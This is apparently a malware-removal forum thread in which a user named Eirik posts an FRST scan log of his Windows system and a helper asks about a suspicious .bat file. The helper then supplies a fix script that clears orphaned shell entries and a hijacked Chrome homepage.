2016-02-10 10:44 - 2015-12-29 16:43 - 05267968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:42 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 10:43 - 2016-01-22 07:40 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-02-10 10:43 - 2016-01-22 07:29 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 10:43 - 2016-01-22 07:28 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 10:43 - 2016-01-22 07:27 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-02-10 10:43 - 2016-01-22 07:02 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-02-10 10:43 - 2016-01-22 06:55 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:52 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 10:43 - 2016-01-22 06:51 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-02-10 10:43 - 2016-01-22 06:50 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:48 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-02-10 10:43 - 2016-01-22 06:48 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:47 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:46 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:35 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:28 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-02-10 10:43 - 2016-01-22 06:27 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00325632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:24 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:08 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02778624 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02120704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 05:58 - 02464256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-02-10 10:43 - 2016-01-19 20:14 - 07453024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-02-10 10:43 - 2016-01-19 20:13 - 02175008 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 10:43 - 2016-01-19 20:13 - 01063464 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01737088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01133744 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01564496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01501496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 00548024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 19:15 - 00246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 10:43 - 2016-01-19 18:30 - 00862720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 17:37 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-02-10 10:43 - 2016-01-10 20:37 - 00136912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-02-10 10:43 - 2016-01-10 17:51 - 03707392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 10:43 - 2016-01-10 17:39 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:38 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 02243584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:27 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:26 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 10:43 - 2016-01-06 19:25 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 10:43 - 2015-12-28 22:42 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSync.dll
2016-02-10 10:43 - 2015-12-28 21:31 - 00578048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSync.dll
2016-02-10 10:43 - 2015-12-17 19:29 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 10:43 - 2015-12-17 17:17 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\system32\NV
2016-02-05 15:36 - 2016-01-23 02:12 - 00110016 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2016-02-05 15:34 - 2016-01-23 04:42 - 42983992 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 37614528 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 31079992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 24911296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 21193544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 20733832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17626352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17218792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 16327896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 12379072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 03145272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 02721216 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01924152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01573432 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00948672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00880576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00747064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00689600 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00501896 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00425016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00423080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00377792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00307768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvkflt.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 00151368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00128512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00038336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2016-02-05 15:22 - 2015-12-18 07:11 - 00047760 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2016-02-05 15:22 - 2015-12-18 07:10 - 00099472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-02-05 15:22 - 2015-12-18 07:10 - 00090768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\Documents\Rise of the Tomb Raider
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Crystal Dynamics
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\Users\Eirik\Documents\League of Legends
2016-01-31 01:28 - 2016-01-31 01:28 - 00341353 _____ C:\Users\Eirik\Desktop\video-1446899994.mp4.mp4
2016-01-26 23:42 - 2016-01-27 17:08 - 50847736 _____ C:\Users\Eirik\Desktop\Compass_Clues_Map.psd
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-21 16:28 - 2015-06-18 12:18 - 00000930 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002UA.job
2016-02-21 16:20 - 2014-11-02 18:55 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-21 15:53 - 2013-08-29 17:54 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-730552332-2537374774-3045828507-1002
2016-02-21 15:14 - 2013-11-19 23:06 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-21 15:02 - 2013-08-30 10:07 - 00000000 ___RD C:\Users\Eirik\Dropbox
2016-02-21 15:02 - 2013-08-30 10:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Dropbox
2016-02-21 15:01 - 2015-08-05 14:44 - 00000000 ___DO C:\Users\Eirik\OneDrive
2016-02-21 15:01 - 2013-09-04 05:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\CrashDumps
2016-02-21 13:32 - 2016-01-20 21:08 - 00004182 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-21 13:29 - 2015-12-26 01:49 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-21 13:29 - 2013-12-22 04:00 - 00000000 ____D C:\Users\Eirik\AppData\Local\LogMeIn Hamachi
2016-02-21 13:27 - 2014-06-20 15:13 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-21 13:27 - 2013-08-22 15:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-21 13:26 - 2013-08-22 14:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-02-21 13:26 - 2013-02-22 19:15 - 00000000 ____D C:\WINDOWS\hr
2016-02-21 13:08 - 2014-07-25 13:25 - 00003916 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{32D050CF-12B8-4CBE-8467-C4377C801BA0}
2016-02-21 12:42 - 2015-07-10 01:03 - 00000000 ____D C:\ProgramData\Apple
2016-02-21 12:42 - 2013-08-22 14:36 - 00000000 ____D C:\WINDOWS\Inf
2016-02-21 04:21 - 2013-09-25 17:32 - 09126400 ___SH C:\Users\Eirik\Desktop\Thumbs.db
2016-02-20 20:02 - 2015-12-26 01:48 - 00000000 ____D C:\ProgramData\afa3c0d4-3a31-1
2016-02-20 20:02 - 2015-12-26 01:48 - 00000000 ____D C:\ProgramData\afa3c0d4-36d7-0
2016-02-20 19:55 - 2015-12-30 22:05 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Skype
2016-02-20 19:45 - 2013-08-29 18:03 - 00000000 __SHD C:\WINDOWS\SysWOW64\AI_RecycleBin
2016-02-20 16:00 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\random.dat
2016-02-20 15:58 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\jagexappletviewer.preferences
2016-02-20 15:55 - 2013-09-14 00:46 - 00000044 _____ C:\Users\Eirik\jagex_cl_runescape_LIVE.dat
2016-02-19 20:27 - 2013-08-22 15:44 - 05103608 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-02-19 18:26 - 2013-12-17 09:57 - 00000000 ____D C:\Users\Eirik\Desktop\Ny mappe
2016-02-19 12:54 - 2013-08-29 17:55 - 00000000 ____D C:\Users\Eirik\Desktop\Spill
2016-02-18 14:04 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-18 11:42 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-17 18:37 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Local\Spotify
2016-02-17 18:09 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Spotify
2016-02-17 13:12 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-02-16 23:25 - 2015-11-13 18:03 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-16 13:24 - 2014-04-10 11:31 - 00000713 _____ C:\Users\Eirik\Desktop\Ranked stuff.txt
2016-02-14 04:28 - 2015-06-18 12:18 - 00000878 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002Core.job
2016-02-13 21:46 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\rescache
2016-02-13 03:06 - 2014-03-18 10:36 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-13 03:05 - 2014-12-12 01:15 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-02-13 03:05 - 2013-08-22 16:36 - 00000000 ___RD C:\WINDOWS\ToastData
2016-02-13 01:50 - 2015-08-18 23:07 - 00000000 ____D C:\Users\Eirik\.oracle_jre_usage
2016-02-13 01:49 - 2013-08-29 22:43 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Program Files\WinRAR
2016-02-13 01:46 - 2013-10-13 21:15 - 00000000 ____D C:\ProgramData\Oracle
2016-02-13 01:32 - 2013-10-06 01:40 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\vlc
2016-02-12 03:38 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-12 02:59 - 2013-08-30 16:41 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 02:54 - 2013-08-30 16:41 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-10 22:20 - 2014-11-02 18:55 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-02-10 10:21 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-10 02:32 - 2013-08-30 14:06 - 00000000 ____D C:\ProgramData\Skype
2016-02-08 19:59 - 2014-03-18 10:51 - 01381246 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-08 19:59 - 2014-03-18 10:23 - 00450948 _____ C:\WINDOWS\system32\perfh014.dat
2016-02-08 19:59 - 2014-03-18 10:23 - 00077588 _____ C:\WINDOWS\system32\perfc014.dat
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-02-05 15:35 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-02-05 15:27 - 2013-12-12 02:23 - 00000000 ____D C:\Users\Eirik\AppData\Local\NVIDIA
2016-02-02 03:37 - 2013-08-22 16:38 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-02 03:37 - 2013-08-22 16:38 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 13:43 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-23 04:42 - 2016-01-01 01:23 - 18758400 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvwgf2umx.dll
2016-01-23 04:42 - 2015-08-18 23:15 - 03258664 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 16995064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvd3dumx.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 14016576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvd3dum.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 03683560 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00468960 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvumdshimx.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00388560 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvumdshim.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00175368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvinitx.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00153392 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvinit.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00034905 _____ C:\WINDOWS\system32\nvinfo.pb
2016-01-23 02:27 - 2014-06-20 15:26 - 00000000 ____D C:\Users\Eirik
2016-01-23 02:04 - 2014-06-20 15:13 - 06368312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 02992064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 02563128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 01263040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvvsvc.exe
2016-01-23 02:04 - 2014-06-20 15:13 - 00532024 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 00393784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 00083512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 00071224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-01-22 22:07 - 2014-06-20 15:13 - 06125650 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-01-22 11:38 - 2016-01-20 21:07 - 00000000 ____D C:\Program Files\AVAST Software
 
==================== Files in the root of some directories =======
 
2013-09-30 11:50 - 2013-09-30 13:33 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe BMP Format CS6 Prefs
2013-10-01 23:21 - 2015-11-29 14:29 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe PNG Format CS6 Prefs
2015-12-26 02:02 - 2015-12-26 02:02 - 0000046 _____ () C:\Users\Eirik\AppData\Roaming\Camdata.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamLayout.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamShapes.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0004536 _____ () C:\Users\Eirik\AppData\Roaming\CamStudio.cfg
2015-12-26 01:52 - 2015-12-26 01:52 - 0000096 _____ () C:\Users\Eirik\AppData\Roaming\version2.xml
2014-05-18 17:30 - 2014-05-18 21:19 - 0000173 _____ () C:\Users\Eirik\AppData\Local\msmathematics.qat.Eirik
2013-10-31 21:32 - 2013-10-31 21:46 - 0000600 _____ () C:\Users\Eirik\AppData\Local\PUTTY.RND
 
Some files in TEMP:
====================
C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe
C:\Users\Eirik\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-21 13:54
 
==================== End of FRST.txt ============================

 

As the post was apparently too long, I've added "Addition.txt" as an attached file. If that's not what you want, I'll just paste it in another reply.

I hope I got this right. As I was doing this, I found I have uTorrent on my computer. I don't think it was activated while doing this, but I can't tell for sure. 

Addition.txt


Hello Eirik
 

It did delete like 29 objects earlier, I dunno if that will show up on the new scan logs? If you do want some of the old, tell me.

No, that's fine. Thank you. 
 

As the post was apparently too long, I've added "Addition.txt" as an attached file.

No problem at all. :)
 

As I was doing this, I found I have uTorrent on my computer. I don't think it was activated while doing this, but I can't tell for sure. 

There is no issue here as long as the programme is not used during this process. 
 
Before we begin, please answer the following questions:

  • Do you recognise this programme? høstprosekt_v5 
  • Do you recognise this file (please refrain from executing)? C:\Users\Eirik\Downloads\replay_1346256955.bat

 

 

  • Do you recognise this programme? høstprosekt_v5 

Ye, I believe so. It's a project from school a few years ago. 

 

 

 

  • Do you recognise this file (please refrain from executing)? C:\Users\Eirik\Downloads\replay_1346256955.bat

Not sure about this. I believe it's a replay from League of Legends, but I can't tell for sure. Should I delete it?


Hi Eirik, 
 

Not sure about this. I believe it's a replay from League of Legends, but I can't tell for sure. Should I delete it?

The file in question is a Windows Batch file, designed to execute commands via the Command Prompt. Did a user/player in-game send you this file to open? When communicating with players online, never download or open files sent to you as this could be a method of malware distribution. Before deleting the file, I would like to double-check the contents. 
 
Please carry out the instructions below. Let me know if the Malwarebytes Anti-Malware (MBAM) outbound blocks still persist or not.
 
STEP 1
Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    CreateRestorePoint:
    ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
    ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
    ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
    ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
    ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
    ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
    Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    C:\Program Files (x86)\Pando Networks
    CHR HomePage: Default -> hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1
    CHR StartupUrls: Default -> "hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1"
